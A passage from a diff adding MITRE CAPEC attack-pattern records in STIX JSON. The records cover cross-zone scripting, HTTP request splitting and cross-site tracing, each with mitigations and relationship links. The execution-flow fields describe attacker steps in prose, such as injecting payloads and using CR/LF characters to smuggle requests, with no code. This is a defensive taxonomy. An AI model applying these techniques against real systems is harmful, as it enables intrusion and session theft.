zone privileges. Skype is using IE web controls to render internal and external HTML pages. \"Add video to chat\" uses these web controls and they are running in the Local Zone. Any user who searched for the video in Skype with the same keywords as in the title field, would have the attackers' code executing in their browser with local zone privileges to their host machine (e.g. applications on the victim's host system could be executed)." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find systems susceptible to the attack: Find systems that contain functionality that is accessed from both the internet zone and the local zone. There needs to be a way to supply input to that functionality from the internet zone and that original input needs to be used later on a page from a local zone.

    2. Techniques
    Leverage knowledge of common local zone functionality on targeted platforms to guide attempted injection of code through relevant internet zone mechanisms. In some cases this may be due to standard system configurations enabling shared functionality between internet and local zones. The attacker can search for indicators that these standard configurations are in place.

Experiment

  1. Find the insertion point for the payload: The attacker first needs to find some system functionality or possibly another weakness in the system (e.g. susceptibility to cross site scripting) that would provide the attacker with a mechanism to deliver the payload (i.e. the code to be executed) to the user. The location from which this code is executed in the user's browser needs to be within the local machine zone.

    2. Techniques
    Finding weaknesses in functionality used by both privileged and unprivileged users.

Exploit

  1. Craft and inject the payload: Develop the payload to be executed in the higher privileged zone in the user's browser. Inject the payload and attempt to lure the victim (if possible) into executing the functionality which unleashes the payload.

    2. Techniques
    The attacker makes it as likely as possible that the vulnerable functionality into which they have injected the payload has a high likelihood of being used by the victim.
    Leverage cross-site scripting vulnerability to inject payload.
", + "x_capec_extended_description": "\n In a zone-based model, pages belong to one of a set of zones corresponding to the level of privilege assigned to that page. Pages in an untrusted zone would have a lesser level of access to the system and/or be restricted in the types of executable content it was allowed to invoke. In a cross-zone scripting attack, a page that should be assigned to a less privileged zone is granted the privileges of a more trusted zone. This can be accomplished by exploiting bugs in the browser, exploiting incorrect configuration in the zone controls, through a cross-site scripting attack that causes the attackers' content to be treated as coming from a more trusted page, or by leveraging some piece of system functionality that is accessible from both the trusted and less trusted zone. This attack differs from \"Restful Privilege Escalation\" in that the latter correlates to the inadequate securing of RESTful access methods (such as HTTP DELETE) on the server, while cross-zone scripting attacks the concept of security zones as implemented by a browser.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target must be using a zone-aware browser." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Ability to craft malicious scripts or find them elsewhere and ability to identify functionality that is running web controls in the local zone and to find an injection vector into that functionality" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Disable script execution.", + "id": "course-of-action--9d62b228-ecb8-4238-bc64-ef63f9d03bd5", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-104-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d53f8236-31b6-44ef-9829-434ecc01751b", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9d62b228-ecb8-4238-bc64-ef63f9d03bd5", + "target_ref": "attack-pattern--ebf5cbfb-36d8-4983-9267-9d17bff3817f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that sufficient input validation is performed for any potentially untrusted data before it is used in any privileged context or zone", + "id": "course-of-action--ec174eec-0e8f-4c98-bfba-3ea29348c294", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-104-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9a5924dc-2691-401b-b498-a96e19330e3f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ec174eec-0e8f-4c98-bfba-3ea29348c294", + "target_ref": "attack-pattern--ebf5cbfb-36d8-4983-9267-9d17bff3817f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Limit the flow of untrusted data into the privileged areas of the system that run in the higher trust zone", + "id": "course-of-action--ebaa0190-21bc-40aa-835b-534ee9459aba", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-104-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ddbbaa85-70d2-430f-b63f-f76eff819192", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ebaa0190-21bc-40aa-835b-534ee9459aba", + "target_ref": "attack-pattern--ebf5cbfb-36d8-4983-9267-9d17bff3817f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Limit the sites that are being added to the local machine zone and restrict the privileges of the code running in that zone to the bare minimum", + "id": "course-of-action--abf207ec-5477-490e-a258-3be7ce5376f4", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-104-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aa57cebd-a942-48ea-8782-ade74acdbddb", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--abf207ec-5477-490e-a258-3be7ce5376f4", + "target_ref": "attack-pattern--ebf5cbfb-36d8-4983-9267-9d17bff3817f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure proper HTML output encoding before writing user supplied data to the page", + "id": "course-of-action--d46c76e7-68c6-4e46-a3a2-d7dd40b98d75", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-104-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a223d161-4991-4c87-8118-ea0ee66f9f31", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d46c76e7-68c6-4e46-a3a2-d7dd40b98d75", + "target_ref": "attack-pattern--ebf5cbfb-36d8-4983-9267-9d17bff3817f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary abuses the flexibility and discrepancies in the parsing and interpretation of HTTP Request messages by different intermediary HTTP agents (e.g., load balancer, reverse proxy, web caching proxies, application firewalls, etc.) to split a single HTTP request into multiple unauthorized and malicious HTTP requests to a back-end HTTP agent (e.g., web server).\n See CanPrecede relationships for possible consequences.\n ", + "external_references": [ + { + "external_id": "CAPEC-105", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/105.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-113", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/113.html" + }, + { + "external_id": "CWE-138", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/138.html" + }, + { + "external_id": "CWE-436", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/436.html" + }, + { + "description": "HTTP Request Splitting", + "external_id": "24", + "source_name": "WASC", + "url": "http://projects.webappsec.org/HTTP-Request-Splitting" + }, + { + "description": "HTTP Response Smuggling, Beyond Security", + "external_id": "REF-117", + "source_name": "reference_from_CAPEC", + "url": "http://www.securiteam.com/securityreviews/5CP0L0AHPC.html" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-617", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Splitting_Smuggling.html" + }, + { + "description": "Robert Auger, HTTP Request Splitting, 2011, The Web Application Security Consortium", + "external_id": "REF-679", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/w/page/13246929/HTTP%20Request%20Splitting" + } + ], + "id": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "HTTP Request Splitting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a", + "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb", + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9", + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b", + "attack-pattern--ce92f5b9-6228-4354-8a1b-72ad7ad3bb84" + ], + "x_capec_child_of_refs": [ + "attack-pattern--9c983530-1927-43ca-addd-63d149cda4a7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Execute Unauthorized Commands", + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n Microsoft Internet Explorer versions 5.01 SP4 and prior, 6.0 SP2 and prior, and 7.0 contain a vulnerability that could allow an unauthenticated, remote adversary to conduct HTTP request splitting and smuggling attacks. The vulnerability is due to an input validation error in the browser that allows adversaries to manipulate certain headers to expose the browser to HTTP request splitting and smuggling attacks. Attacks may include cross-site scripting, proxy cache poisoning, and session fixation. In certain instances, an exploit could allow the adversary to bypass web application firewalls or other filtering devices. Microsoft has confirmed the vulnerability and released software updates.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey network to identify target: The adversary performs network reconnaissance by monitoring relevant traffic to identify the network path and parsing of the HTTP messages with the goal of identifying potential targets.

    2. Techniques
    Scan networks to fingerprint HTTP infrastructure and monitor HTTP traffic to identify HTTP network path with a tool such as a Network Protocol Analyzer.

Experiment

  1. Identify vulnerabilities in targeted HTTP infrastructure and technologies: The adversary sends a variety of benign/ambiguous HTTP requests to observe responses from HTTP infrastructure in order to identify differences/discrepancies in the interpretation and parsing of HTTP requests by examining supported HTTP protocol versions, HTTP headers, syntax checking and input filtering.

  2. Cause differential HTTP responses by experimenting with identified HTTP Request vulnerabilities: The adversary sends maliciously crafted HTTP requests with custom strings and embedded web scripts and objects in HTTP headers to interfere with the parsing of intermediary and back-end HTTP infrastructure, followed by normal/benign HTTP request from the adversary or a random user. The intended consequences of the malicious HTTP requests will be observed in the HTTP infrastructure response to the normal/benign HTTP request to confirm applicability of identified vulnerabilities in the adversary's plan of attack.

    3. Techniques
    Continue the monitoring of HTTP traffic.
    \n Utilize different sequences of special characters (CR - Carriage Return, LF - Line Feed, HT - Horizontal Tab, SP - Space and etc.) to bypass filtering and back-end encoding and to embed:\n \n additional HTTP Requests with their own headers\n malicious web scripts into parameters of HTTP Request headers (e.g., browser cookies like Set-Cookie or Ajax web/browser object parameters like XMLHttpRequest)\n adversary chosen encoding (e.g., UTF-7)\n \n to utilize additional special characters (e.g., > and <) filtered by the target HTTP agent.\n Note that certain special characters and character encoding may be applicable only to intermediary and front-end agents with rare configurations or that are not RFC compliant.\n
    Follow an unrecognized (sometimes a RFC compliant) HTTP header with a subsequent HTTP request to potentially cause the HTTP request to be ignored and interpreted as part of the preceding HTTP request.

Exploit

  1. Perform HTTP Request Splitting attack: Using knowledge discovered in the experiment section above, smuggle a message to cause one of the consequences.

    2. Techniques
    Leverage techniques identified in the Experiment Phase.
", + "x_capec_extended_description": "\n This entails the adversary injecting malicious user input into various standard and/or user defined HTTP headers within a HTTP Request through user input of Carriage Return (CR), Line Feed (LF), Horizontal Tab (HT), Space (SP) characters as well as other valid/RFC compliant special characters and unique character encoding. This malicious user input allows for web script to be injected in HTTP headers as well as into browser cookies or Ajax web/browser object parameters like XMLHttpRequest during implementation of asynchronous requests.\n This attack is usually the result of the usage of outdated or incompatible HTTP protocol versions as well as lack of syntax checking and filtering of user input in the HTTP agents receiving HTTP messages in the path.\n This differs from CAPEC-34 HTTP Response Splitting, which is usually an attempt to compromise a client agent (e.g., web browser) by sending malicious content in HTTP responses from back-end HTTP infrastructure. HTTP Request Splitting is an attempt to compromise aback-end HTTP agentvia HTTP Request messages.\n HTTP Smuggling (CAPEC-33 and CAPEC-273) is different from HTTP Splitting due to the fact it relies upon discrepancies in the interpretation of various HTTP Headers and message sizes and not solely user input of special characters and character encoding. HTTP Smuggling was established to circumvent mitigations against HTTP Request Splitting techniques.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_peer_of_refs": [ + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80" + ], + "x_capec_prerequisites": [ + "An additional intermediary HTTP agent such as an application firewall or a web caching proxy between the adversary and the second agent such as a web server, that sends multiple HTTP messages over same network connection.", + "Differences in the way the two HTTP agents parse and interpret HTTP requests and its headers.", + "HTTP headers capable of being user-manipulated.", + "HTTP agents running on HTTP/1.0 or HTTP/1.1 that allow for Keep Alive mode, Pipelined queries, and Chunked queries and responses." + ], + "x_capec_resources_required": [ + "Tools capable of crafting malicious HTTP messages and monitoring HTTP messages responses." + ], + "x_capec_skills_required": { + "Medium": "Possess knowledge on the exact details in the discrepancies between several targeted HTTP agents in path of an HTTP message in parsing its message structure and individual headers." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: evaluate HTTP agents prior to deployment for parsing/interpretation discrepancies.", + "id": "course-of-action--94b24ec6-eaed-40ba-aa65-789101ea9a55", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4c7aff6e-7858-4273-ba44-dc920b8ff560", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--94b24ec6-eaed-40ba-aa65-789101ea9a55", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: front-end HTTP agents notice ambiguous requests.", + "id": "course-of-action--64555d1a-a57e-49d9-b9f8-02c843ba1af5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8d3cd512-2e70-4e56-a57c-507684d1f6d1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--64555d1a-a57e-49d9-b9f8-02c843ba1af5", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: back-end HTTP agents reject ambiguous requests and close the network connection.", + "id": "course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b867b8e9-a2c3-4882-98c9-3d5fa142fddb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable reuse of back-end connections.", + "id": "course-of-action--65a59d08-b52c-4c78-b802-6e65c65f02e5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8a78056e-5c0e-44f8-800a-91b0b7178716", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--65a59d08-b52c-4c78-b802-6e65c65f02e5", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Use HTTP/2 for back-end connections.", + "id": "course-of-action--948de9b9-7ad6-4bf5-8daf-f2208db360d6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ffba3f90-bbb1-4ab0-bf6a-750ca56acabd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--948de9b9-7ad6-4bf5-8daf-f2208db360d6", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Use the same web server software for front-end and back-end server.", + "id": "course-of-action--4bd16590-2382-4a10-9712-f28b7bf84fec", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c718be44-09e6-4be5-9a91-f792b8219ef4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4bd16590-2382-4a10-9712-f28b7bf84fec", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Utilize a Web Application Firewall (WAF) that has built-in mitigation to detect abnormal requests/responses.", + "id": "course-of-action--5cc83b32-2b3e-41e5-94e8-2e2ea48bf660", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--260f7f64-cbe9-46c3-b7b8-2528b37847d6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5cc83b32-2b3e-41e5-94e8-2e2ea48bf660", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Install latest vendor security patches available for both intermediary and back-end HTTP infrastructure (i.e. proxies and web servers)", + "id": "course-of-action--43085d5c-cd1e-4175-9d44-f28f8f3cc5f9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--558063de-9f07-40ca-a209-3935e9afaddd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--43085d5c-cd1e-4175-9d44-f28f8f3cc5f9", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Ensure that HTTP infrastructure in the chain or network path utilize a strict uniform parsing process.", + "id": "course-of-action--50ea55ae-d8a8-4279-9dc9-05b6fb416b84", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-8", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1d29447c-15a4-4126-bef5-8a3dec2bc73a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--50ea55ae-d8a8-4279-9dc9-05b6fb416b84", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Utilize intermediary HTTP infrastructure capable of filtering and/or sanitizing user-input.", + "id": "course-of-action--a2e15722-f07d-44db-b988-af501e0f1e13", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-9", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4c046dff-3500-4208-a8f7-e7d170ad1267", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2e15722-f07d-44db-b988-af501e0f1e13", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it referes to an existing chain relationship between \"CAPEC-93 : Log Injection-Tampering-Forging\" and \"CAPEC-63 : Cross-Site Scripting\". Please refer to these CAPECs going forward.", + "external_references": [ + { + "external_id": "CAPEC-106", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/106.html" + } + ], + "id": "attack-pattern--87829d14-eece-4fa3-b36f-54cc3b2262ae", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: XSS through Log Files", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Cross Site Tracing (XST) enables an adversary to steal the victim's session cookie and possibly other authentication credentials transmitted in the header of the HTTP request when the victim's browser communicates to a destination system's web server.", + "external_references": [ + { + "external_id": "CAPEC-107", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/107.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "external_id": "CWE-648", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/648.html" + }, + { + "description": "Cross Site Tracing", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Cross_Site_Tracing" + }, + { + "description": "Jeremiah Grossman, Cross-Site Tracing (XST), 2003, WhiteHat Security", + "external_id": "REF-3", + "source_name": "reference_from_CAPEC", + "url": "http://www.cgisecurity.com/whitehat-mirror/WH-WhitePaper_XST_ebook.pdf" + } + ], + "id": "attack-pattern--f14acee3-770c-4154-a9b2-9eda908c6a9f", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Cross Site Tracing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346" + ], + "x_capec_child_of_refs": [ + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An adversary determines that a particular system is vulnerable to reflected cross-site scripting (XSS) and endeavors to leverage this weakness to steal the victim's authentication cookie. An adversary realizes that since httpOnly attribute is set on the user's cookie, it is not possible to steal it directly with their malicious script. Instead, the adversary has their script use XMLHTTP ActiveX control in the victim's IE browser to issue an 